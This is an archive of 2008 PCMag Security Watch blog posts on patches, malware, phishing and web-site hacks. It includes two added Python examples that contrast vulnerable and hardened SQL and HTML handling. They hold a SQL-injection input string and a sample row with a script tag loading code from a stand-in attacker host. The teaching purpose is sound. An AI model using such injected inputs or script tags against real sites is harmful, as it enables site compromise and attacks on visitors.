Office 2007 SP1 To Go On Automatic Updates June 16

Posted by Security Watch - May 10, 2008 on 12:49 pm | In PCMag Security | No Comments The Office Sustained Engineering blog has announced that Office 2007 Service Pack 1, which has been available since December 2007, will go out over Automatic Updates starting June 16. Users will receive the very large update over a sustained period of time; June 16 is merely the first date at which people will receive it this way. If you don't want to wait, you don't have to: Office 2007 Service Pack 1 may be downloaded through Microsoft Update at any time or directly from the Microsoft Download Center. (Warning: the direct download version is 218.3 MB.)


Free Firewall Aces PC Mag’s Tests

Posted by Security Watch - May 9, 2008 on 3:35 pm | In PCMag Security | No Comments Looking for killer anti-malware software that'll keep your system clean from nearly all security threats and won't cost you a dime? ThreatFire 3.5 does an outstanding job of preventing known and unknown malware from attacking a clean system. While standard signature-based antivirus/antispyware programs can't recognize a threat that's too new to have a signature, ThreatFire's sophisticated behavior analysis allows it to identify and eliminate all threats, both old and new. We tested it against other antivirus/antispyware apps and found it performed just as well as some of its popular, premium-priced rivals. In fact, its scores are among the highest we've ever seen, garnering it PC Mag's Editors' Choice Award. Read all about the product and the test results in the full review on PCMag.com. Post by Errol Pierre-Louis


Microsoft To Release 3 Critical, 1 Moderate Update Next Week

Posted by Security Watch - May 8, 2008 on 9:00 pm | In PCMag Security | No Comments Microsoft's Advance Notification for May 2008 reveals that Patch Tuesday next week will bring 3 critical updates and one moderate one. The first critical vulnerability affects the Jet database engine in Windows 2000, Windows XP and Windows Server 2003, and is critical on all three. The second is for Microsoft Word in all current editions of Office from Office 2000 Service Pack 3 to Office 2007 Service Pack 1, including Office 2004 and 2008 on the Mac, the Word Viewer and the Office Compatibility Pack, but it's only critical on Office 2000 Service Pack 3. The third critical vulnerability affects Publisher on all Windows editions of Office, but is also only critical on Office 2000 Service Pack 3. One moderate vulnerability affects Windows Live OneCare, Microsoft Antigen, Windows Defender, Forefront Security and the Standalone System Sweeper. All the usual other updates will happen, including non-security updates and an update to the Malicious Software Removal Tool.


Acrobat Attacks Stepping Up

Posted by Security Watch - May 8, 2008 on 12:44 pm | In PCMag Security | No Comments Symantec is reporting that Neosploit, a popular exploit toolkit, is beginning to carry attacks against vulnerabilities patched in Acrobat a few months ago. Even though we had already reported attacks in the wild for this, Symantec argues that these new exploits are especially dangerous because they "...will work reasonably silently through most browsers. If a user is enticed to a hostile Web site (who knows which ones are hostile these days) using the browser of their choice, it is reasonably likely that their computer will become infected provided that they have Acrobat installed on their computer." Click here to get the latest version of Acrobat Reader. Full Acrobat versions are also affected.


McAfee Reports Widespread Fake Media File Attack

Posted by Security Watch - May 8, 2008 on 11:48 am | In PCMag Security | No Comments McAfee is reporting a major outbreak of a Trojan named Downloader-UA.h. According to the stats from their customers' scans, quite a few users are actually infected with it, and hundreds of thousands of PCs have reported detections. The Trojan is especially prevalent on peer-to-peer networks like Limewire. The Trojan is disguised as an MPG or MP3 file; the names and sizes vary quite a bit. When the user attempts to launch it they are instead directed to download a file named PLAY_MP3.exe. If you run it, a EULA is displayed (this is all the rage among malware authors); agree to it and adware is installed on your system. A later McAfee blog entry has a video of how the infection proceeds.


Vietnamese Firefox Distribution Carried Malware

Posted by Security Watch - May 8, 2008 on 8:59 am | In PCMag Security | No Comments Mozilla's Window Snyder (love that name) announced on her Mozilla Security Blog that the Vietnamese language pack for Firefox 2 contains malicious code. They do scan for these things when uploaded, but such scans are more apt to miss malware when it's new. It wasn't detected for months. Everyone who downloaded the Vietnamese language pack since February 18, 2008 has the infection. A new pack will be available soon, but in the interim Window recommends that users disable the current one using the Tools-addons dialog box. The malicious code is not itself a virus, but the handiwork of one. Someone involved in development had a virus infection and that virus modified the help files in this language pack to include malicious script that loads annoying windows and other such things. It cannot propagate from a Firefox user's PC, nor does it damage other content in any way.


Windows XP Service Pack 3 Actually Released

Posted by Security Watch - May 6, 2008 on 4:04 pm | In PCMag Security | No Comments I may have jumped the gun last time, but Microsoft has definitely made Windows XP SP3 available for download. The one-file network download is 316.4 MB. As Microsoft points out, if you're only updating one computer you are much better off using Windows Update, which should also be offering SP3. The download will be much smaller from there. The release had been delayed by a bug that affected users of Microsoft Dynamics Retail Management System, their point of sale solution. A hotfix is available for such users to apply prior to installing XP SP3. All that's the good news. The bad news is that if you click through to the actual download, the file request generates an HTTP 404 error—in other words it's not there. We have also heard reports of users unable to get at it through Windows Update, and also reports of successful downloads, and it has shown up through Automatic Updates as well. In all likelihood this is a temporary problem either with Microsoft's servers or Akamai or something like that. It is also definitely available through Windows Software Update Services.


Malware Takes On Annoying Characteristics of “Legit” Software

Posted by Security Watch - May 5, 2008 on 3:20 pm | In PCMag Security | No Comments We're seeing reports of malware vendors including advertising (predictably, for other malware) in their own programs. We've also heard of malware authors attempting to assert intellectual property rights for their code. What's next, per-call support charges? Copy protection? The advertising isn't completely new, although it's certainly just as galling as the first time. And in the end it's unsurprising and even logical. Stranger is the equivalent of a EULA with an enforcement provision. Of course, malware authors are just as anxious as legit programmers to protect their products from copying. Symantec reported one botnet kit was being sold with an agreement stipulating that you couldn't copy it or resell it. Violate these rules and they—get ready for this—threaten to rat you out, with technical detail, to the anti-virus companies so that your network will be taken down. Of course, merchants like this can't go to the authorities to enforce their contracts, so it's not surprising that they would act like mobsters, or at least pretend to act like mobsters. They may as well have threatened to break your knees. Of course the story says that the cat's out of the bag on this and nobody has been ratted out to Symantec yet.


Google Audio CAPTCHA Cracked

Posted by Security Watch - May 3, 2008 on 7:18 am | In PCMag Security | No Comments So much attention is paid to cracking graphical CAPTCHAs, and a lot of progress has been made in that field. Now Wintercore has come up with a smart breakthrough: analysis and automated cracking of audio CAPTCHAs. From early on it was noticed that graphical CAPTCHAs present a problem for the sight-impaired (what we would have called "blind" a few years ago). Out of common decency and perhaps to avoid legal problems for their products and services being inaccessible to the disabled, many CAPTCHA implementers started adding an audio option. In the case of the GMail signup page, for example, there is a small graphic of the universal disabled symbol of a character in a wheelchair next to the text field for the user to type. The title of the graphic, which would be spoken to a user with accessibility software, is "Listen and type the numbers you hear". Try it on GMail and listen to the sample. There is a woman's voice speaking numerals with a lot of creepy nonsense voice between the numerals. The nonsense sounds like backwards talking, reminiscent of The Exorcist or I Am The Walrus. Once spoken, the voice says "once again" and the numerals and nonsense repeat. The nonsense is disturbing enough that I suspect many people would have trouble hearing the numerals, but I suppose Google figured they had to do something to impede simple automated analysis. They didn't do enough. Wintercore did waveform analysis on the audio and noticed that the numeral portions were easily distinguishable from the nonsense parts. The rest is simple pattern recognition. Wintercore wrote a tool which they show a video of on the blog, demonstrating that the audio CAPTCHAs can be cracked with very high reliability, much better than what has been demonstrated with graphical ones. You'll note that the Wintercore blog is about 2 months old. It didn't get widespread notice until just recently when 0x000000.com, the hacker webzine, picked up on it. Wintercore ends with advice to Google by pointing out the biggest weaknesses in the CAPTCHA. I wonder whether the device is all that useful, because it sounds to me as if addressing them will make the CAPTCHA even more difficult for a human to understand. The current weak one is not easy.


Vulnerability Reported In MS Works

Posted by Security Watch - May 2, 2008 on 12:42 pm | In PCMag Security | No Comments BKIS Research from Vietnam is reporting a vulnerability in Microsoft Works versions 7 and 9, the latter of which is the current version. The flaw is in an ActiveX control shipped with the product and exploit HTML code is provided, but the flaw is characterized as local, meaning that it cannot be exploited from the web. BKIS shows a crash exploit and claims that it should be able to execute shellcode, but doesn't specifically claim that they have done so. This may be just a language problem, as the English in the report is awkward at times. The advisory also includes instructions on how to set the kill bit for the vulnerable control.


Thunderbird 2.0.0.14 Released

Posted by Security Watch - May 1, 2008 on 9:57 pm | In PCMag Security | No Comments When we announced the security and stability update in Firefox 2.0.0.14 a couple of weeks ago, we noted that the update affected Thunderbird as well. We also noted that the Thunderbird update that fixed the bugs wasn't yet available. The same was true of the updates fixed in Firefox 2.0.0.13. It's available now, according to the Mozilla Developer Center. New versions of Thunderbird for Windows, Mac and Linux may be found at www.getthunderbird.com, and appear to fix three vulnerabilities revealed since March. You can download it directly from the www.getthunderbird.com site, or use the Check Updates feature, or wait for the automatic update to happen.


BBC Reports Facebook Vulnerability

Posted by Security Watch - May 1, 2008 on 10:18 am | In PCMag Security | No Comments The BBC is reporting that they have discovered a flaw in the Facebook social networking site that could compromise user privacy. The problem, reported on the BBC technology program Click, appears to be in the site's application model. Facebook allows users to write applications, but Click found that these applications could gather personal profile information on users or their friends. This data includes some of the information you provide to Facebook as part of your personal profile. The BBC was unclear on what profile elements could and could not be obtained, but they indicate that it's more than is proper. At first glance it's not clear how much of a scandal there is here. When you add an application in Facebook you are asked to approve certain capabilities for the application, among them that it "Know who I am and access my information". Further explanation for this option states:
Granting access to information is required to add applications. If you are not willing to grant access to your information, do not add this application.
Not much room to maneuver here. You want the application, you give the information. So the point of the BBC report is that this is built into the Facebook model and that users may not appreciate that they are giving up as many details as they are. Facebook deals with this on the one hand by warning users to be careful about adding applications, which is useless boilerplate because there are no real guidelines for how they might exercise such caution. On the other hand, their terms of service prohibit abuse of others' personal information. To make matters worse, applications may be running in part on third-party servers, making the enforcement of Facebook's terms even sketchier. The BBC says that Facebook "... also advises users to use the same precautions while downloading software from Facebook applications that they use when downloading software on their desktop." This exposes the emptiness of the whole endeavor. If Facebook applications are to be considered as potentially dangerous as desktop applications then they need more security facilities.


Why Do Browsers Trash My Data?

Posted by Security Watch - May 1, 2008 on 12:03 am | In PCMag Security | No Comments It's happened to all of us: You fill out a web form with a lot of data and click a button and... your data is gone and nothing happened. The back button doesn't fill it out again. Well, most of the time it doesn't. VeriSign's Phillip Hallam-Baker asks why this is. He doesn't answer his own question, but merely poses this as a usability problem which has been ignored by browser authors for years. But in fact it's a feature of browsers, which are, by default, "stateless." Special exceptions have been added here and there; as Hallam-Baker notes, browsers remember passwords, which are a special HTML field type. But adding the ability to remember field values as part of the browser history would probably open up many cans of worms. It's a sign of the conservatism that years of security vulnerabilities have beaten into browser authors that problems like this remain.


Must You Install Zango?

Posted by Security Watch - May 1, 2008 on 12:00 am | In PCMag Security | No Comments Infamous adware vendor Zango, known as much for their legal troubles as for their misleading practices, still remains in business. Sunbelt Software has written lately of Zango sites they have observed. These are sites which push Zango software and receive money in return. Sunbelt has found one which claims to require that you install Zango in order to view the site, but the requirement is easily bypassed. On other sites, the requirement is enforced. In another post, they promo a screen saver that sends the Zango home site down in flames. All this is amusing from afar, but the moral of the story is that Zango never was trustworthy software and remains that way.


Free Beta For F-Secure Home Server Security

Posted by Security Watch - April 30, 2008 on 11:58 pm | In PCMag Security | No Comments Do you use Windows Home Server? In spite of one nasty, if rare, bug, I think it's a great product that makes home networks much better organized and secure. Now F-Secure has opened up their beta for a security add-in product for Windows Home Server. It automatically scans files for malware when they are written to or accessed from a Windows Home Server. Scheduled scans can also be set. If you provide good feedback F-Secure will give a free 12-month subscription when the product ships. You might wonder whether it's wise to run a beta security product, and normally I wouldn't. I enthusiastically signed up for this one because I see fewer opportunities for application conflicts on a Windows Home Server than on a normal Windows desktop. And F-Secure makes excellent security products with malware detection among the very best. I've been running it for a few days now and sense no problems. You've got to decide what you're comfortable with though. WHS does make a good point at which to add a second AV product and scanner to your work, especially inasmuch as F-Secure uses multiple engines in their product.


New Windows Utility Claims To Bypass UAC

Posted by Security Watch - April 28, 2008 on 4:01 pm | In PCMag Security | No Comments The authors of iReboot, a program that sets which OS you want to reboot into, thought they were really clever when they rewrote their program so that Vista users didn't have to go through a UAC (User Account Control) check every time they ran it. Instead, what they did was make their users' systems vulnerable to attack and betray their inexperience with Windows programming. The authors had a classic bad Windows program to begin with, in that it required Administrator access, but their inaccurate assumption was that everyone on XP runs as Administrator anyway. On Vista the default is different, and even Administrators have to click a button to continue when executing privileged actions. So they rewrote their program into two halves, one a user mode interface, and the other a Windows service running in a privileged user context such as SYSTEM. The two communicate using standard IPC (interprocess communication). They view what they did as programming around UAC, but it's not as clever as they think. In fact, the installer for their program required Administrator access and the user has to consent through Administrator access to the installation of a service like this. This means that the user has to trust the program that they install in this case, whether it's a legitimate service or malware. Now by the same token, what they've done is the right way to write such a program. If you need to perform privileged actions you should separate them into a secure process, but you need to take proper precautions to secure the interface with that process. The facilities for making it secure, such as user impersonation, are rich and well-understood. In fact, the program's authors later describe, in a comment to the same blog entry, how they used .NET to create the IPC mechanism and how it was really easy and powerful. I read all the time of people becoming impatient with UAC, but it's there for a good reason. Even if it's not an actual security boundary, it reminds you that something potentially dangerous is happening on the system and you should consider whether you really want to do it. I run it on all my Vista systems; it doesn't happen very often and I don't resent it when it does. If it's happening all the time to you, maybe you need to think about how you're using your computer.


Phishers Move Into Malware

Posted by Security Watch - April 28, 2008 on 3:56 pm | In PCMag Security | No Comments The most famous tool used for building phishing sites is called Rock Phish. It's well-known for making professional-looking sites, but now it has added malware to its arsenal. Originally reported by RSA, the kit has added data-stealing malware, the Zeus Trojan. Zeus itself is a kit one can buy. The trojan installs through the usual collection of vulnerabilities and user tricks. Mixing phishing and malware is not entirely new, but it seems to be a trend. Just recently Trend Micro reported on phishing e-mails, also generated by Rock Phish, which push malware disguised as a "digital certificate." The bottom line from this attack is the usual advice users get: Be very careful about clicking links in e-mails, and keep your anti-malware definitions up to date.


HackerTeen Comic Teaches Ethical Hacking

Posted by Security Watch - April 28, 2008 on 3:53 pm | In PCMag Security | No Comments

O'Reilly Media is famous as a publisher of books with über-geeky content on the inside and peculiar animals on the cover. With HackerTeen: Internet Blackout Volume 1 (O'Reilly, US $19.99) they've taken a completely new direction. Written by Marcel Marques and the HackerTeen team, it's a graphic novel aimed at entertaining teens while teaching them about Internet security and hacker ethics.

HackerTeen is actually an educational project in Brazil that teaches "computer network security, entrepreneurship on the Internet, and hacker ethics". To accomplish this aim it uses a variety of tools including Role Playing Games and comics. Students who master the online courses can advance their skill level through a series of six belts: white, yellow, green, blue, brown and black. According to the site the teaching includes a psychological accompaniment and makes use of Paolo Freire's non-traditional educational methods. But don't try to sign up just yet - at present the distance learning courses are all in Portuguese and all classroom instruction takes place in São Paulo, Brazil. It's not cheap, either; each belt level requires four payments of $200 to $390.

I submitted the book for analysis by an expert on graphic novels and teen attitudes - my 13-year-old son. He devoured the story, enjoyed it, and asked for volume 2 (alas, it's not yet available). But he wasn't pleased with the price. Twenty bucks, he informed me, would buy a lot more manga-style entertainment in the form of a new Usagi Yojimbo book or two Ranma ½ books. Well, I'm sure O'Reilly expects that parents, not teens, will buy the book.


Mass Web Server Hack Through SQL Injection

Posted by Security Watch - April 27, 2008 on 3:32 pm | In PCMag Security | No Comments A massive hack of web servers is underway, perhaps involving hundreds of thousands of Windows web servers. The servers themselves are then altered to serve attack code against client systems. Contrary to an initial report that a newly-reported Windows vulnerability was being exploited to compromise the web sites, it appears that no Windows vulnerability is at issue here. The sites are being compromised through "SQL injection." SQL injection is an attack technique used against web sites with database back-ends. It's common, for example, for web sites to take input from users, such as name, address and phone number, and enter that into a database. With SQL injection the attacker enters field values that contain SQL commands in an attempt to trick the database engine into executing them. In this case, the site is then reprogrammed to serve JavaScript attacks to clients. Usually, SQL injection requires some knowledge of the database structure and trial and error, but these attackers seem to have found a generic way to "pollute" any Microsoft SQL Server without any such specific knowledge. See this FAQ on the attack at Hackademix.net for technical elaboration on the attack. The problem in web sites that have been hacked comes down to sloppy programming in the ASP and ADO/ADO.NET code. Unfortunately it's necessary these days to check user inputs for such tricks, even though this isn't something that occurs to many programmers. The scale of this attack is such that Microsoft may need to come out with a cleaning tool for users and other tools to help prevent it in the future.
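The "sloppy programming" the post refers to is the habit of building a SQL statement by gluing user input into its text, which is what lets field values be read as commands. The following is an added example, not code from the post or from any of the affected sites: it uses Python's standard sqlite3 module (rather than the ASP/ADO stack the post mentions) against a constructed in-memory table, puts the vulnerable query beside its parameterized replacement, and finishes with the kind of cleanup check an administrator would run to find rows that have already been "polluted" with a script tag. The table, rows and inputs are all made up for the example.

```python
import sqlite3

# Constructed sample data standing in for a site's back-end database: two
# ordinary rows plus one row already "polluted" with a script tag, the way the
# mass attack altered the content that pages serve to clients.
SAMPLE_ROWS = [
    (1, "alice", "Welcome to the site"),
    (2, "bob", "Opening hours: 9 to 5"),
    (3, "news", 'Latest update <script src="http://attacker.invalid/x.js"></script>'),
]


def make_db():
    """Build an in-memory SQLite database holding the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER, owner TEXT, body TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_unsafe(conn, owner):
    """Vulnerable pattern: the user's value is spliced into the statement text,
    so the engine cannot tell the application's SQL from the user's input."""
    sql = "SELECT id FROM pages WHERE owner = '" + owner + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, owner):
    """Hardened pattern: a parameterized query. The value is bound separately
    from the statement, so whatever it contains is compared as data, never run."""
    return [row[0] for row in conn.execute("SELECT id FROM pages WHERE owner = ?", (owner,))]


def find_injected_script(conn):
    """Cleanup check: list rows whose text column already carries a script tag
    (SQLite's LIKE is case-insensitive for ASCII, so <SCRIPT> is caught too)."""
    return [row[0] for row in conn.execute("SELECT id FROM pages WHERE body LIKE '%<script%'")]


def demo():
    """Run both lookups with an ordinary value and with a constructed value
    that contains SQL syntax, and return the results for comparison."""
    conn = make_db()
    hostile = "' OR '1'='1"  # constructed input: text that the engine would read as SQL
    return {
        "unsafe_normal": lookup_unsafe(conn, "alice"),   # [1]
        "unsafe_hostile": lookup_unsafe(conn, hostile),  # every row: [1, 2, 3]
        "safe_normal": lookup_safe(conn, "alice"),       # [1]
        "safe_hostile": lookup_safe(conn, hostile),      # [] because no owner has that literal name
        "polluted_rows": find_injected_script(conn),     # [3]
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The point of the comparison is that the hardened version needs no knowledge of what "tricks" an attacker might type: the database never sees the input as part of the statement, so the check the post says programmers must remember to write is done by the driver. The LIKE scan is a blunt instrument, useful for triage after an incident, not a substitute for fixing the queries.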


Automatic distribution of Windows Vista SP1 begins today

Posted by Security Watch - April 23, 2008 on 9:02 pm | In PCMag Security | No Comments Microsoft announced that starting today, Windows Vista Service Pack 1 is being distributed over Windows Update through the Automatic Updates feature. English, French, German, Spanish, and Japanese Windows versions are affected. Others will follow later, but they are available now on the Microsoft Download Center. If you have Automatic Updates enabled, as is the default, SP1 will download in the background. When the download is done you will get a tool tip from the tray that says "New updates are available." Click on the tip and follow some prompts and it will install. The process of getting to everyone through Automatic Updates could take some time, so don't be surprised if it doesn't happen quickly.


Government Sites Hit With JavaScript Attacks

Posted by Security Watch - April 23, 2008 on 5:17 pm | In PCMag Security | No Comments Attack campaigns against web sites are nothing new, but a recent one has targeted many government web sites, including some in the United Kingdom. The attacks are JavaScript injection attacks. Web pages on the sites are modified by the attack so that users surfing them receive attack code that comes directly from a site they probably trust. The attacks are the usual grab bag of client attacks against old, long-patched vulnerabilities, but which will probably be successful in many cases. At least 20,000 sites have been compromised, including "a civil service recruitment site belonging to the UK government, a United Nations events site and several high-traffic tourism portals." Your best defense as a web user is to keep your system patched and up to date.


ISP Subscriptions and the Right To Privacy

Posted by Security Watch - April 23, 2008 on 4:53 pm | In PCMag Security | No Comments The New Jersey Supreme Court has held that, under the Constitution of the (great) state of New Jersey, "citizens have a reasonable expectation of privacy in the subscriber information they provide to Internet service providers." The opinion was unanimous. The decision, State of New Jersey v. Shirley Reid, concerned a disgruntled employee's (Reid's) abuse of her employer's computers. Someone changed passwords on a system remotely. Armed with the IP address of the remote user and the employer's assertion that Reid was the only one with the requisite knowledge of the systems to perform the change, the police obtained the subscriber information associated with that address from Comcast under a municipal subpoena. The subpoena was defective for using the case name "Timothy C. Wilson, Plaintiff, vs. Shirley Reed [sic], Defendant" (Wilson was her employer), even though no such case was pending. The court held the seizure of the information unreasonable under the New Jersey Constitution, which reads, in the relevant section (Article I, Section 7):
The right of the people to be secure in their persons, houses, papers, and effects, against unreasonable searches and seizures, shall not be violated; and no warrant shall issue except upon probable cause, supported by oath or affirmation, and particularly describing the place to be searched and the papers and things to be seized.
If that sounds familiar, it's because it's word-for-word the exact same language as the Fourth Amendment to the United States Constitution. Interestingly, the opinion notes that Federal Courts have not found such a right with respect to ISP subscription data, but that New Jersey law has been stronger in its protections of consumer subscription data. It also noted that the police could still obtain the data through legitimate procedures, specifically a grand jury subpoena. If you don't like the weak protections available in Federal courts, you can always move to New Jersey. Our real estate prices could use your support.


Retroactive Patches For XP SP3

Posted by Security Watch - April 22, 2008 on 11:13 pm | In PCMag Security | No Comments It's no less ironic for being logical: Microsoft today revised one of the most recent Patch Tuesday's bulletins to account for Windows XP SP3. In MS08-024 (Cumulative Security Update for Internet Explorer) version 2.0 of the bulletin was released to announce that Internet Explorer 7 on Windows XP SP3 is an affected component. (Personally, I think they should have called the new bulletin version 1.0 SP1.) Given that the patch and SP3 were being finalized at about the same time it's only reasonable that Microsoft had to leave the new patch out of the service pack so that the service pack could be effectively tested. Still funny though. The update to MS07-040 (Vulnerabilities in .NET Framework Could Allow Remote Code Execution), issued in July 2007, is a little more complicated. The various .NET Framework versions are added as affected components under XP SP3, and it's further stated that this is a detection update only; the patch itself is unaffected. But why is this an issue at all? Why didn't SP3 include this update itself? Perhaps it's because the .NET Framework is not a mandatory Windows component. It's possible that a user could have an XP SP3 system with no .NET on it and then install those .NET versions, thus being vulnerable. This stuff can be complicated.


XP SP3 Is Out

Posted by Security Watch - April 21, 2008 on 9:30 pm | In PCMag Security | No Comments Have you been waiting up nights for it? Windows XP Service Pack 3 has been released. Click here for the download page. Click here for the release notes. XP SP3 is largely a roll-up of earlier service packs and updates. There are a few improvements and even a new feature or two, but for most users who regularly apply fixes from Windows Update it adds nothing as such. It looks like only the US English, Japanese and German versions are available as I write this. The update is not yet available on Windows Update. SP3 can be installed on top of XP SP1 or SP2, but not, it seems, SP0 (Windows XP with no service packs). Because not everyone wants to install it, Microsoft did not include Internet Explorer 7 in SP3. You are free to install it separately if you wish. Many other new features which have been released since XP SP2 are included, such as MMC (Microsoft Management Console) 3.0, MSXML 6, and WPA2 (Wi-Fi Protected Access). Several new features, some security-related, are included. There are improvements in the detection of "black hole routers," which are routers that silently discard packets. SP3 also includes support for Microsoft's NAP, or Network Access Protection. NAP is roughly similar to Cisco's NAC, and both pre-qualify a client to access a network in terms of configuration, e.g. whether certain patches are applied or anti-virus updates are up-to-date. The Security Options Control Panel applet has more explanatory text for its settings. There are also improvements to the Microsoft Kernel Mode Cryptographic Module and Windows Product Activation.


A Hack We Can Believe In

Posted by Security Watch - April 21, 2008 on 7:34 pm | In PCMag Security | No Comments Hackers redirected portions of the BarackObama.com web site to HillaryClinton.com, according to several reports. It's amazing more of this sort of thing hasn't happened already, especially since web-based donations are more important than ever to the campaigns. Four years ago Security Watch reported on a phishing e-mail that asked for donations to the John Kerry campaign. The Obama hack used a cross-site scripting flaw in the site to redirect users from Obama's Community Blogs section to HillaryClinton.com. XSS bugs are getting far more attention lately than they had been in the past, perhaps because they are so widespread. And since the answer to them is good programming practices rather than running some security product, they can be difficult to snuff out.
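The post's remark that the answer to XSS is good programming practice rather than a product deserves a concrete illustration of what that practice is. The following is an added example, not code from the post or from either campaign site: a minimal comment renderer written in Python, with the vulnerable form (user text pasted straight into the markup) beside the hardened form (every user-controlled value HTML-encoded at the point of output, using the standard library's html.escape), plus a small check that shows the difference. The author and comment strings are constructed for the example.

```python
import html

# Constructed inputs: an ordinary comment and one that smuggles in a tag.
SAMPLE_AUTHOR = "Joe Public"
SAMPLE_BODY = "Great post"
HOSTILE_BODY = "Nice post <script>/* constructed */</script>"


def render_comment_unsafe(author, body):
    """Vulnerable pattern: user-controlled text is spliced directly into the
    page's HTML, so any tags it carries become part of the page's active content."""
    return f"<p><b>{author}</b>: {body}</p>"


def render_comment_safe(author, body):
    """Hardened pattern: HTML-encode every user-controlled value where it is
    written into the markup. html.escape() also encodes quotes, so the same
    call keeps a value inert inside an attribute, not only in element text."""
    return f"<p><b>{html.escape(author)}</b>: {html.escape(body)}</p>"


def contains_live_script(rendered):
    """Check a rendered fragment for a script element the browser would run."""
    return "<script" in rendered.lower()


def demo():
    """Render the constructed comments both ways and report which output
    still carries a live script tag."""
    return {
        "unsafe_live": contains_live_script(render_comment_unsafe(SAMPLE_AUTHOR, HOSTILE_BODY)),  # True
        "safe_live": contains_live_script(render_comment_safe(SAMPLE_AUTHOR, HOSTILE_BODY)),      # False
        "safe_output": render_comment_safe(SAMPLE_AUTHOR, HOSTILE_BODY),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The encoded output still displays the literal characters the user typed (the browser shows "&lt;script&gt;" as "<script>"), which is why this fix costs nothing in functionality. The discipline is to encode at output time, in the context the value lands in; an attribute or a script block needs its own encoding rules, and a template engine that does this by default removes the reliance on every programmer remembering it.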

 



Apple Tweaks Software Update Program

Posted by Security Watch - April 18, 2008 on 10:51 am | In PCMag Security | No Comments After taking a beating for it here and elsewhere, Apple has changed its tactics for the ASU (Apple Software Update) program. What got the controversy going was when the Safari browser for Windows was released, and Apple advertised it in the ASU along with bug fixes as an "update," and defaulted to installing it. They have taken the same approach in the past with iTunes. Several days ago a new version of ASU was sent out through the ASU itself, and the approach is different. Now new programs, meaning programs of which the user does not already have a version installed, are put in a separate section and labeled explicitly as "New Software." They are still checked by default, though. Ryan Naraine in eWEEK describes the thinking of the developers in making these changes, and some other nuances in how the program behaves differently.

 



Whale Phishing

Posted by Security Watch - April 18, 2008 on 10:36 am | In PCMag Security | No Comments One of the things I love about cutting-edge technology is the way we get to invent fun, new terminology. It seems to have been around before, but I just came across my first reference to "whale phishing." It describes a phish where the target is a very important person, such as a CEO, i.e. a very big target. An example of the phenomenon was written up in this Internet Storm Center writeup, which describes a phony subpoena sent to several CEOs, purportedly from the US Courts. It was further written up by McAfee, including a screen shot, in their blog. The recipient is given a link to click on; if they do so, they are asked to install a "browser plug-in" in order to view the document; the file is named Acrobat.exe. If they run it, they are served with malware which McAfee classifies as TROJ_AGENT.AMAL. Of course, the US Courts don't e-mail subpoenas directly to CEOs.

 



PayPal Plans to Ban Unsafe Browsers - Including Safari?

Posted by Security Watch - April 18, 2008 on 9:36 am | In PCMag Security | No Comments In a whitepaper entitled "A Practical Approach to Managing Phishing", PayPal has announced their approach to phishing, including banning users from performing sensitive transactions using browsers which do not have adequate protections against phishing. We've previously reported that PayPal considers Safari to be insecure for exactly these reasons. Ergo, it would seem that PayPal is planning to disallow the use of Apple's Safari for transactions. See Ryan Naraine's story in eWEEK for more information on these developments.

 



Mysterious Privilege Escalation Bug in Windows

Posted by Security Watch - April 18, 2008 on 8:17 am | In PCMag Security | No Comments In an advisory lacking in details, Microsoft is reporting a privilege escalation vulnerability in many, perhaps all, versions of Windows. The bug requires attack code to be executed already in the context of the NetworkService or LocalService accounts. The program could then gain access to resources in other processes running as NetworkService or LocalService, and possibly elevate its privileges to LocalSystem. The advisory seems most concerned with web hosting contexts, perhaps out of concern that user-submitted code could escape privilege limitations and compromise other users' sites. The advisory says that "User-provided code running in IIS, for example ISAPI filters and extensions, and ASP.NET code running in full trust may be affected by this vulnerability." More common configurations are not affected by it: the advisory lists default installations of IIS 5.1, IIS 6.0 and IIS 7.0, ASP.NET configured to run at a trust level lower than Full Trust, and classic ASP code. The "out of band" advisory shows that Microsoft is concerned about the problem. It refers to "public reports" of the problem, but we have not yet identified these. Update: It appears that the public reports were this incident from several weeks ago. If Microsoft's account of the limitations of the attack is accurate, then the language used by Cesar Cerrudo, founder and Chief Executive Officer of Argeniss Information Security, who announced the vulnerability and discussed it yesterday in Dubai, is overstated.

 



Four Bugs Fixed In Safari Update

Posted by Security Watch - April 16, 2008 on 9:13 pm | In PCMag Security | No Comments Four more vulnerabilities in Apple's Safari browser on both Windows and Mac OS X were fixed in an update today. Two of the vulnerabilities could allow arbitrary code execution. One of the others, which could allow a malicious site to control the address bar on Windows, was publicly disclosed last June. The last could allow cross-site scripting. The Apple Software Update program will bring Safari to version 3.1.1 with this update.

 



Firefox Update Fixes Crash Bug

Posted by Security Watch - April 16, 2008 on 8:49 pm | In PCMag Security | No Comments An earlier Firefox security fix (MFSA 2008-15, "Crashes with evidence of memory corruption") introduced a stability problem, causing the browser to crash sometimes during JavaScript garbage collection. The nature of these crashes was such that they might be exploitable. This problem was fixed in MFSA 2008-20, which brings Firefox to version 2.0.0.14. Thunderbird and SeaMonkey are also affected, although Thunderbird is only affected if the user changes the default setting whereby JavaScript is disabled in HTML e-mails. As has usually been the case lately, while the advisory announced a new Thunderbird 2.0.0.14, the latest available version on the Mozilla site is 2.0.0.12.

 



XP SP3 Set For April 29 Debut

Posted by Security Watch - April 16, 2008 on 5:17 pm | In PCMag Security | No Comments There's no official word from Microsoft, but Neowin is reporting a schedule for the release of Windows XP SP3. The schedule, as reported, is thus:
  • April 14, 2008: Support is available for the release version of Service Pack 3 for Windows XP
  • April 21, 2008: Original Equipment Manufacturers, Volume License, Connect, and MSDN and TechNet subscribers
  • April 29, 2008: Microsoft Update, Windows Update, Download Center
  • June 10, 2008: Automatic Updates
Previous reports indicate that XP SP3 adds nothing substantial for security or features; it is mostly a vast rollup of previous updates. It would therefore be a good idea not to install it as soon as it is available, at least not without a full system backup. Microsoft is facilitating this approach by not making the update automatic until almost two months after it becomes available. In fact, there are already reports of problems with systems after the installation of release candidates of SP3, such as Media Center systems to which the "banana hack" has been applied not being able to log on to domains.

 



11 Critical Security Apps

Posted by Security Watch - April 15, 2008 on 12:50 pm | In PCMag Security | No Comments

If your computer has no Internet connection and you never install software, it's probably safe from attack by viruses and such--as long as you don't plug in a virus-infested photo frame. Oops! And face it, if you're reading this, you're connected to the Internet with all its marvels and horrors. If you haven't secured your PC, it's an Internet mugging waiting to happen.

